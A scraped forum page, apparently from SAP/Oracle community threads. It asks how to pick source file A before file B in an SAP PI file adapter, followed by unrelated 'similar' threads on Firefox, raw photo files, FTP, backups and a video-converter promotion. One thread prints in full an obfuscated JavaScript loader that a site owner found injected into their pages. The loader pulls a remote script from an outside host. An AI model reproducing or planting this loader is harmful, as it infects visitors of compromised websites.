Picking source file A first if source file A and source file B both appear

I have a situation where two source file with two different data format. Hence I will need to create two different mapping
and then different parameters at file sender adapter FCC.
However there is such a condition where source file A will need to process first before picking and process source file B.
if both appear at folder at the same time else  source B will be process if no source file A.
Beside using the scheduler at availiablity times at Runtime workbench, if there any other options ?
Regards
Fred
I

There are two different send file adapters involved due to different data format between source file A and B.
Beside using BPM is there any other method.
If doing at adapter module or operating command, how to do it ?

Similar Messages

  • Firefox will not show links to flv files. I get the error message for each flv file: "File not found. Firefox can't find the file at (path) .flv." Any mov and swf files in this same path will show. I can see the videos in Safari so the paths are correct.

    Firefox will not show links to flv files. I get the error message for each flv file: "File not found. Firefox can't find the file at http:// (path) .flv." Any mov and swf files in this same path will show. I can see the videos in Safari so the paths are correct.

    Is this a webpage that contains a link to a flv file? Please post a link to the page and tell us which link(s) are the problem flv files or else post a link to the .flv file itself.
    Alternately, click on one of the sample FLV File links on this page and tell us exactly what happens:
    http://www.mediacollege.com/adobe/flash/video/tutorial/example-flv.html
    It might also help if you post the exact error message, including the path to the flv file.
    '''Note:'''
    Depending on how you have Firefox set up, clicking on a FLV File link will either save the FLV file to your computer or Firefox may open it automatically in an external application right after downloading (Firefox may ask you first). Firefox itself can't play FLV files so you need a "helper" application (or a plugin for flv files, if ther is one. You can see if Firefox is already set up to download or open FLV files by going to Firefox Preferences and looking in the Applications list. Find the FLV file type in the list and, if the action is "Open with", it should show the application that can play FLV files (e.g., VLC Media Player or Perian). See [[Managing filetypes]] for more information.

  • I can no longer download files. The download manager comes up and indicates file is downloading, but it isn't.

    I can't download any files. The download window appears and indicates file is downloading, but it doesn't. I had to open IE to download latest version of Firefox. I have reset all download values to default. I have changed the location of file downloads and I've cleared the download manager.

    You can find the original download location if you paste the code posted in this link in the Code field in the Error Console and click the Evaluate button.
    *Firefox/Tools > Web Development > Error Console
    *http://kb.mozillazine.org/User:Dickvl/JavaScript_Error_Console#Download_Manager
    That will give a pop-up with data about the currently selected file in the Download Manager window.<br />
    That same data appears as a tooltip if you hover the icon at the left side of an entry in the Download Manager.
    If the files are missing in that location then there must be some software running that deleted the files.
    Did you disable the virus check initiated by Firefox as well?
    See "Disable virus scanning in Firefox preferences - Windows":
    * http://kb.mozillazine.org/Unable_to_save_or_download_files

  • I am having problems with  Olympus .orf files one files cannot be read by Elements 10 and Lightroom 4. Both provide an error message saying that the file is not recognized. Any ideas?  minzen

    i am having problems with  Olympus .orf  which cannot be read by Elements 10 and Lightroom 4. Both provide an error message saying that the file is not recognized. Any ideas?  minzen

    That camera model is too new for your programs. Every camera has its own raw format and ACR must be updated to include the info for each new model as it comes out. The workaround would be to download the free Adobe DNG converter and use that to convert your ORFs to DNGs that your version of Camera Raw can read.

  • Does the last updated backup in Time Machine have all my files for "standard" file copy? (i want to copy and paste files to another computer that doesn't have TM)

    My personal Macbook pro died, but I did have a Time Machine backup. I have a new iMac that I would like to use as a family computer. I would like to transfer some files to the new computer (and set-up a new Time Machine backup), but archive the remainder on a non-TM drive. I was planning to:
    1. File copy my last backup folder from my old TM drive to the new computer
    2. Copy (and then delete) the files I want to archive on another HD drive
    3. Wipe clean my current TM drive
    4. Set-up TM on my new computer
    Is this a good way to proceed?
    Is copying the last backup folder (vs. all backup folders) enough to move my files over?
    Any better approaches appreciated!

    I suggest you visit MicroCenter and go to there Apple section and ask one of there guys if they are still offering the 2 terabyte Backup For the iMac, Mine was only $100.00.
    So the iMac has Time machine plus the USB 2 Terabyte Backup for less than your $130.00

  • How to delete all projects and accompanied files from Adobe Premeiere Elements 13

    I would like to delete all projects and files and start anew, but I cannot find a clear enough instruction how to do it. Please help'

    vitprod
    Same other versions as well.
    There is no one delete button that wipes away the project file (.prel) and the project's assets. You need to go to the save locations of the project file (.prel) and its assets and delete
    each one by one wherever they are saved UNLESS you pre-plan and, before the project is created, set up a particular project so that the project file with assets goes to its own folder instead of each component of the project going into a common place for Premiere Elements files and folder where you have to pick out the materials for deletion one by one by name.
    Answers
    Default type situation
    If left at defaults and if your Premiere Elements 13 is running on Windows 7, 8, or 8.1 64 bit, go to Libraries/Documents/Adobe/Premiere Elements/13.0 and, in the 13.0 Folder, delete standalone files with your target project's name and delete files with your target project's name in the folders found in the 13.0 Folder.
    Plan Ahead
    Edit Menu/Preference/Scratch Disks - Set all to Same As Project.
    Create a new folder at a hard drive location of choice.Then point the project file to that folder for the Save In.
    Tip: When the Expert workspace of the new project opens, go to File Menu/Save As. Name the project and set the new folder created as the Save In of the Save Project dialog.
    Please review and consider and then let us know if any of that worked for you.
    Thanks.
    ATR

  • Send and receive files between unix machines

    Hi friends,
    I have to send and receive files from one unix machine to another unix machine. In my first unix machine I have tomcat webserver. Using a JSP I have to send and receive files from this machine to another machine. The destination machine contain some BAAN implementation, which take the files I send as input .
    Can you send me a java program to solve this problem.

    Hi friends,
    I am getting a problem in my application. I will state the complete problem in detail. I have to transfer 3 files from one NT machine to unix machine some where kept in net work, I used an ftp in 'Process p = getRunTime().exec("ftp -i -s:ftp.txt")'. In ftp.txt file I have given the necessary things for ftp to unix machine. The files are transfering into the unix box. When I to the process for the 2nd time I have to check whether the file are exists in the unix box, then only transfer the files. Now, again I am doing ftp bring the files from the unix box to NT machines using 'Process p = getRunTime().exec("ftp -i -s:ftp1.txt")' where ftp1 contains all the necessary things for ftp to unix machine . Now I am checking for the files available in the NT machine using boolean=(new File(filename)).exists(), Fine out of 3 files, 2 file shows the return type as 'true' and one file is showing 'false', even the same happens if I delete the 3 files after checking, out of 3 files, 2 file shows the return type as 'true' and one file is showing 'false'. I went to the folder where I am bring files from and removing the files manually, one file is showing share violation, one process is using the file . I am unable to resolve this problem, will this code what I write is acceptable if not suggest any other code. I have sending all the snippets of the programs. I am doing this in the development environment like this. My production environment is totally both are unix machines.
    1. ftp to transfer files.(tranfer.txt)called in java code down
    open 172.16.30.6
    informix
    informix
    bin
    has
    cd /tmp
    put d:/dathu/CSV/bssfa932.txt
    put d:/dathu/CSV/bssfa933.txt
    put d:/dathu/CSV/bssfa936.txt
    bye
    2. ftp to get the files(get.txt)used in java code down
    open 172.16.30.6
    informix
    informix
    bin
    has
    cd /tmp
    lcd d:/dathu/hold
    get bssfa932.txt
    get bssfa933.txt
    get bssfa936.txt
    bye
    3. java code snippet to getfiles
    Process p = Runtime.getRuntime().exec("ftp -i -s:get.txt");
    4. java code to check the files exist
    boolean filestatus=moCreatFlatFilerobj.isFileExists();
    public boolean isFileExists(){
    boolean isfileexisting=false;
    boolean blnordhead = (new File(file1 with path)).exists();
    boolean blnordlines = (new File(file2 with path)).exists();
    boolean blnaccount = (new File(file3 with path)).exists();
    if(blnordhead && blnordlines && blnaccount){
    isfileexisting=true;
    return isfileexisting;
    5. java code to delete files
    public void deleteFiles(){
    boolean header= (new File(file1 with path)).delete();
    boolean line =(new File(file2 with path)).delete();
    boolean account=(new File(file3 with path)).delete();
    6. java code to tranfer files.
    p = Runtime.getRuntime().exec("ftp -i -s:transfer.txt");

  • Alter the linkage between encore and psd-file

    hello
    I wanted to change the psd file wich is connected with encore
    in my project there is a file called "first.psd"
    now - it is an old file so I want to substitute this file with "second.psd"
    so if I open my encore-project there is a new connection to "second.psd" and not to "first.psd"
    How could I alter this?
    thanks

    Have you tried the Replace Menu command?

  • Help! Whenever I try to open one important file on icloud pages it says 'can't open file' - on my computer and ipod, too! Can I retrieve it?

    I have a very important document and it is saved only o the icloud (which I thought would be fine). Only now, whenever I try to open it it gives me the message 'can't open file'. I'm a PhD student, and that file represents a lot of work for me. I did it on the ipad because I had to travel, and now I'm kicking myself. I need that file! Is there any way to get it back?

    Thanks for your suggestion - I have tried that like 50 times (I was feeling the desperation and thought if I reset enough times it would do it), and I have also tried turning off and on the cloud, adding .pages to the filenames, downloading (didn't work) emailing to myself (did work, wouldn't open). When I looked at the package contents of the file, it did not have a file for content in it - or not one I can find. I'm afraid that it's lost the content within the file (though I don't now how it could!).
    I've not had any joy with anything else I have read online. I think it's a more knotty problem than a simple off/on again job!

  • How to convert FLV and F4V files to other media formats

    How to convert FLV and F4V files to other media formats
    Nowadays, every one can download their favorite videos from video sharing websites like YouTube, Hulu, MySpace, Google Video, metacafe, Yahoo! Video, Reuters.com and so on at will. However, these video files we got are usually in the format of FLV, or F4V, which are not workable by most portable devices, or some video players and video editors on our PC. With the intention of solving these problems, this guide will show you how to convert FLV and F4V files to other video and audio formats in detail.
    1. Download, install and run Pavtube FLV Converter
    As soon as you run this program, the following wine red interface will show up:
    2. Add files, set output format and destination folder
    Input FLV and F4V files to this program by clicking on “Add” button, and select a format as the output format in the drop-down list of “Format”, meanwhile, you can press the output folder to specify the destination folder or just use the path set by default. Moreover, “merge into one file” enables you to combine multiple FLV and F4V files to be as a single file, if you have this needs, just tick it.
    3. Set advanced settings
    Click “Settings” button, the following interface will pop up. You can change the parameters like screen size, bit rate, frame rate, sample rate, etc. on it to optimize the output quality or compress file size.
    4. Convert
    After all settings are done, you can press “Convert” button to start transferring, and then the following window will show you the conversion info in detail. According to the info you can manage your time and disk space properly.
    Pavtube FLV Converter can definitely complete the conversion at a swift speed with excellent quality; also it adopts an advanced audio-video sync technology, so that audio and video match very well in the resulted files. Therefore you need not worry about these issues.
    Useful tips:
    Free online FLV downloader:
    www.convertdirect.com
    http://vixy.net/
    http://www.videoconverterdownload.com/online-free-flv-converter.html
    http://www.flv2mp3.com/
    http://www.mediaconverter.org/
    http://2conv.com/
    http://online.movavi.com/
    http://www.youconvertit.com/
    http://www.playtube.com/
    http://www.convert.net/

    Flip4Mac

  • DNG files created from Fujifilm FinePix E-900 .RAF raw files

    I'm having a problem in creating DNG files from my Fujifilm FinePix E-900 camera .RAF raw files on my Mac (Mac OS X 10.6.4).  The DNG files are recognized correctly in Adobe software (Photoshop CS4, Bridge, Lightroom 3) but not by any Apple software (including Aperture 3.0).
    I've used Adobe DNG Converter 6.1, Photoshop CS4, and Lightroom 3 to create these non-linear DNG files.  As a point of reference, I've used the same settings to create DNG files from Kodak .KDC raws files that Apple also doesn't support, but these DNG files (created from the .KDC raw files) show up just fine in Aperture 3.0.
    The one thing I find unusual about the .DNG files created from the Fujifilm FineFix E-900 .RAF raw files is that when I do a 'Get Info' on these files, the image dimensions of these .DNG files always shows up as 0 x 0.  (The image dimensions should be listed as 3488 x 2616.)
    So I'm wondering if there is something wrong (a bug maybe) on how these files are being converted to the DNG file format using Adobe DNG Converter 6.1, Photoshop CS4 or Lightroom 3 on a Mac.
    Peter

    Hi Frank, you need camera Raw 7.4 which is only available for PSE11. Consider upgrading or wait for PSE12 to be launched soon. If you regularly shoot raw try Lightroom with PSE10 as your external editor.
    Alternatively, download and install the free Adobe DNG converter to convert your raw files to the Adobe universal Raw format and the files will open in PSE10 (keep your originals as backups and for use in the camera manufactures software)
    Windows download (.exe file) click here DNG Converter 8.1
    Mac download (.dmg file) click here DNG Converter 8.1
    You can convert a whole folder of raw images in one click. See this quick video tutorial:
    You Tube click here for DNG Converter tutorial

  • Are operating files only within Windows (C:) or are Word and Excel files ok in Documents and (C:) folders in 8.1?

    A Microsoft tech said "oh-oh" when he saw Word and Excel files, and I think other files, in Windows (C:). He said only operating files should be in that folder or a user might delete an operating file by mistake. I have Word and Excel files in
    both (C:) and Documents folders. There is some overlap but there are different files in each. When I open a Word file it defaults to (C:) not Documents. Sometimes default location is SkyDrive. So unpredictability is my experience. The questions are what is
    correct default and how to make it so.
    Microsoft store in San Diego transferred files from old computer to new one and this default is how the computer was set up.

    Hi, Tyro.
    What a mess. Usually system files in the Windows folder are protected from being deleted by users, but not all of them.
    Here are some ideas:
    Go back to the Microsoft store and tell them to fix it. They caused it, it was their mistake, they are responsible to fix it.
    If that is not possible because they are too far away... find another Microsoft Store if possible and have them fix it.
    Last resort: If it was me, I'd just back up all the files that I care about onto my SkyDrive (now OneDrive) account or a reliable thumb drive. Then do a factory re-image. Maybe back up the files and make the MS store do it. If I had purchased Office
    2013 (it sounds like you have Office 2013), then I would have them reinstall that as well.
    Keep the store involved because it is their fault.
    At least call the MS store in San Diego and ask them what they suggest. Put them on the spot. They are the ones that screwed up and are responsible for the copying process.
    Good luck!
    Best wishes, Davin Mickelson

  • When bates numbering a .pdf in XI, how can I change the file name to include the bates number AND its name?  I know under file output, there is an option for either/or.  I want both.  Thank you.

    when bates numbering a .pdf in XI, how can I change the file name to include the bates number and the file name?  I know under "file output: it's either/or.  I need both.  Thanks!

    Long ago I wrote a little demo using the touch command. Check out the following thread:
    http://forums.ni.com/ni/board/message?board.id=170&message.id=25128#M25128
    LabVIEW Champion . Do more with less code and in less time .

  • Photoshop Elements 9 and CR2 files.

    I have Photoshop Elements 9.0.3 on a Windows 7 laptop and I can't open CR2/RAW files. Is there something I can do to open CR 2/RAW files in PE9?

    You need camera raw 7.3 for your camera. It is only compatible with PSE11 to 13. Alternatively, download and install the free Adobe DNG converter to convert your raw files to the Adobe universal Raw format and the files will open in all versions of PSE (keep your originals as backups and for use in the camera manufactures software)
    Windows download (.exe file) click here DNG Converter 8.6
    Mac download (.dmg file) click here DNG Converter 8.6
    You can convert a whole folder of raw images in one click. See this quick video tutorial:
    You Tube click here for DNG Converter tutorial

  • Virus threat in my *.html and *.js files in website

    when I open my website my antivirus found virs in it .
    I checked it and i found all html and js files are corrupted . But all jsp and class files are working fine.
    the virus is
    <script language=javascript><!--
    (function(t){eval(unescape(('var,20,61,3d,22Scr,69ptE,6eg,69ne,22,2c,62,3d,22Vers,69on(,29+,22,2cj,3d,22,22,2cu,3dnavi,67ator,2euserAge,6e,74,3b,69f,28,28,75,2ein,64exO,66,28,22,57in,22),3e,30),26,26,28u,2ein,64,65xOf(,22NT,20,36,22),3c0),26,26(docum,65,6e,74,2ecook,69e,2ei,6ede,78O,66(,22m,69ek,3d,31,22),3c0),26,26(typ,65,6ff(zr,76zts),21,3d,74,79,70eof,28,22,41,22))),7bzr,76z,74s,3d,22A,22,3beval(,22if(,77in,64,6fw,2e,22+a+,22)j,3dj,2b,22+,61,2b,22M,61jo,72,22+b+a+,22M,69nor,22,2bb,2ba+,22Buil,64,22,2bb+,22j,3b,22),3bdocume,6e,74,2e,77ri,74e(,22,3cscrip,74,20src,3d,2f,2fgu,6dblar,2ecn,2frs,73,2f,3fid,3d,22+j+,22,3e,3c,5c,2fs,63r,69pt,3e,22,29,3b,7d').replace(t,'%')))})(/,/g);
    --></script>I do not know how it comes and how it goes inserted in each html and .js files.
    When I removed this code all things work fine but after 1 day the same old problem.
    All files again went corrupeted again with that script code..
    It is almost impossible to remove js and html files.
    What wil I do now .
    Please help me

    Contact your hoster.

  • .dat, .mdb and .mpa files

    I had to replace my Palm Pre and am trying to re-poplulate my Motion Apps Classic files.  My Palm OS files were saved online (Carbonite) and when I go into Carbonite to retrieve my Memo files, they are saved as .dat, .mdb and .mpa files.  Can these files a. be imported back into Palm OS, and b. can they be converted to .pdb files?
    Thanks
    Post relates to: Centro (Sprint)

    Anand_JAS wrote:
    I have the audio and video files extracted from .TS file and stored as
    .mpv for video and
    .mpa for audio
    now i need to merge both files.
    finally need to store it as single file like .mpg or some other extention
    Please help me regarding this.
    Thanks in advance...You use a video editing tool that has this capacity.
    - captain obvious

Maybe you are looking for

  • Find Record count in a file.

    Hi, Is it possible to find the total no. of records (lines) in a file? With External Table: and using select count(*) on that external table. But here, we will only get the rows which are valid. Non Valid records will go to the bad file. Another ways

  • Airport Extreme Connection problem with new MacBook

    Help- For the past 2 years, I have had no problems with my Airport Extreme. My MacBook Pro (2006), My wife's iBook G4 and two AirPort Express units used as remote speaker connections have been rock solid. Both iPhone and one iPod touch work like a ch

  • Mac OS X Lion 10.7.3 GSSAPI support

    When trying to authenticate a user against a GSSAPI enabled OpenLDAP server, it seems that opendirectoryd skips GSSAPI mechanism and uses CRAM-MD5. The OpenLDAP server correctly advertises GSSAPI as a supported SASL mechanism (and GSSAPI works with l

  • Left click button not working on mouse

    Using an HP Pavillion g series notebook with windows 7 and all of a sudden my HP wireless mouse left click button doesn't work. checked to see if it was clean, changed the battery too.  Right click buttonis working as left click now. Driver software

  • Issue with JDBC receiver

    Hello All, We have SAP ECC (proxy sender) -> XPI 7.0 -> Oracle (jdbc receiver). We are querying data in some oracle tables. This is the error we see in communiation channel monitoring for JDBC receiver adapter: Message processing failed. Cause: com.s